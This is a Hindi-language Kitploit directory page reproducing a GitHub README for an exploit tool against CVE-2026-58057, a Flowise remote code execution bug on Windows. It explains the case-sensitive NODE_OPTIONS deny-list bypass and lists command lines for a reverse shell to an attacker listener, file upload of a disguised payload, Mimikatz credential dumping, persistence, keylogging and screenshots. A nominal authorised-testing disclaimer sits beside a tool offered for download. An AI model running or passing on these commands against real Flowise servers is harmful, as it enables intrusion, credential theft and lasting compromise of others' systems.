Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE एक्सप्लॉइट CVE-2026-58057 के लिए। केस-सेंसिटिव खामी के माध्यम से एनवायरनमेंट वेरिएबल सत्यापन को बायपास करता है। MCP stdio के माध्यम से मनमाना कोड इंजेक्ट करने के लिए node_options का उपयोग करता है। रिवर्स शेल, पर्सिस्टेंस, फ़ाइल अपलोड, क्रेडेंशियल डंपिंग का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
स्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
पेलोड डेवलपमेंट
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

रिपॉजिटरी देखें
1222 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Flowise Windows RCE एक्सप्लॉइट CVE-2026-58057 के लिए। केस-सेंसिटिव खामी के माध्यम से एनवायरनमेंट वेरिएबल सत्यापन को बायपास करता है। MCP stdio के माध्यम से मनमाना कोड इंजेक्ट करने के लिए node_options का उपयोग करता है। रिवर्स शेल, पर्सिस्टेंस, फ़ाइल अपलोड, क्रेडेंशियल डंपिंग का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

Flowise CVE-2026-58057 - Windows रिमोट कोड एक्ज़ीक्यूशन एक्सप्लॉइट

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 अवलोकन

यह CVE-2026-58057 के लिए एक प्रोडक्शन-ग्रेड एक्सप्लॉइट है, जो Windows प्लेटफ़ॉर्म पर Flowise में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। यह भेद्यता केस-सेंसिटिव एन्वायरनमेंट वेरिएबल वैलिडेशन के कारण उत्पन्न होती है, जो लोअरकेस node_options को ब्लॉक करने में विफल रहता है, जिससे हमलावर NODE_OPTIONS डेनीलिस्ट को बायपास कर सकते हैं और Custom MCP stdio कॉन्फ़िगरेशन के माध्यम से मनमाना कोड निष्पादित कर सकते हैं।

यह एक्सप्लॉइट मॉड्यूलर आर्किटेक्चर, व्यापक त्रुटि प्रबंधन और कई पेलोड प्रकारों के समर्थन के साथ पेशेवर सॉफ्टवेयर इंजीनियरिंग प्रथाओं को प्रदर्शित करता है।

f1

f2

⚠️ अस्वीकरण

महत्वपूर्ण: यह टूल केवल अधिकृत सुरक्षा परीक्षण, पेनेट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

🔍 तकनीकी विवरण

भेद्यता का मूल कारण

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

एक्सप्लॉइट तंत्र

  1. हमलावर Flowise में प्रमाणीकरण करता है

  2. Custom MCP stdio नोड बनाता/संशोधित करता है

  3. लोअरकेस node_options एन्वायरनमेंट वेरिएबल इंजेक्ट करता है

  4. वैल्यू को --require malicious-loader.js पर सेट करता है

  5. जब MCP stdio चलता है तो Node.js लोडर को निष्पादित करता है

  6. मनमाना कोड निष्पादन प्राप्त होता है

✨ विशेषताएँ

मुख्य क्षमताएँ

  • ✅ Reverse Shell - हमलावर मशीन से वापस कनेक्ट करें

  • ✅ Bind Shell - टारगेट पर लिसनिंग पोर्ट खोलें

  • ✅ Command Execution - मनमाना सिस्टम कमांड चलाएँ

  • ✅ File Upload - टारगेट सिस्टम पर फ़ाइलें अपलोड करें

  • ✅ Persistence - कई पर्सिस्टेंस तंत्र

  • ✅ Information Gathering - सिस्टम खुफिया जानकारी एकत्र करें

  • ✅ Credential Dumping - Mimikatz एकीकरण

  • ✅ Screenshot Capture - डेस्कटॉप स्क्रीनशॉट कैप्चर करें

  • ✅ Keylogger - कीलॉगिंग क्षमता स्थापित करें

तकनीकी विशेषताएँ

  • 🔐 एकाधिक प्रमाणीकरण विधियाँ - API key या उपयोगकर्ता नाम/पासवर्ड

  • 🔄 ऑटो-रिट्री लॉजिक - नेटवर्क समस्याओं के प्रति लचीला

  • 🧹 सेल्फ-क्लीनिंग - टारगेट से लोडर फ़ाइलें हटाता है

  • 🌐 क्रॉस-प्लेटफ़ॉर्म - Windows/Linux/macOS पर काम करता है

  • 🎨 रंगीन आउटपुट - बेहतर पठनीयता

  • 📊 वर्बोज़ डिबगिंग - समस्या निवारण के लिए विस्तृत लॉगिंग

📦 इंस्टॉलेशन

आवश्यक शर्तें

  • Python 3.6 या उच्चतर

  • pip (पायथन पैकेज मैनेजर)

त्वरित इंस्टॉलेशन

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Docker इंस्टॉलेशन (वैकल्पिक )

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 उपयोग

कमांड लाइन विकल्प

python3 exploit.py --help

प्रमाणीकरण विकल्प

विकल्पविवरणउदाहरण
-t, --targetFlowise URL (आवश्यक)http://localhost:3000
-k, --api-keyFlowise API कुंजीflowise_abc123...
-u, --usernameउपयोगकर्ता नामadmin
-p, --passwordपासवर्डpassword123

पेलोड विकल्प

विकल्पविवरणउदाहरण
--payloadपेलोड प्रकारreverse_shell
--lhostलिसनर होस्ट192.168.1.100
--lportलिसनर पोर्ट4444
--commandनिष्पादित करने के लिए कमांडwhoami
--local-fileअपलोड करने के लिए फ़ाइलpayload.exe
--remote-pathदूरस्थ सहेजने का पथC:\\Temp\\update.exe

निष्पादन विकल्प

विकल्पविवरण
--interactiveइंटरैक्टिव शेल प्रारंभ करें
--verboseडिबग आउटपुट सक्षम करें
--timeoutअनुरोध टाइमआउट सेकंड में
--retriesपुनः प्रयासों की संख्या

📝 उपयोग उदाहरण

1. बेसिक रिवर्स शेल

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. इंटरैक्टिव रिवर्स शेल

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. कमांड निष्पादन

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. फ़ाइल अपलोड

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. क्रेडेंशियल डंपिंग (Mimikatz )

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. पर्सिस्टेंस इंस्टॉलेशन

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. सूचना संग्रह

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. स्क्रीनशॉट कैप्चर

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 पेलोड प्रकार

टूल डाउनलोड करें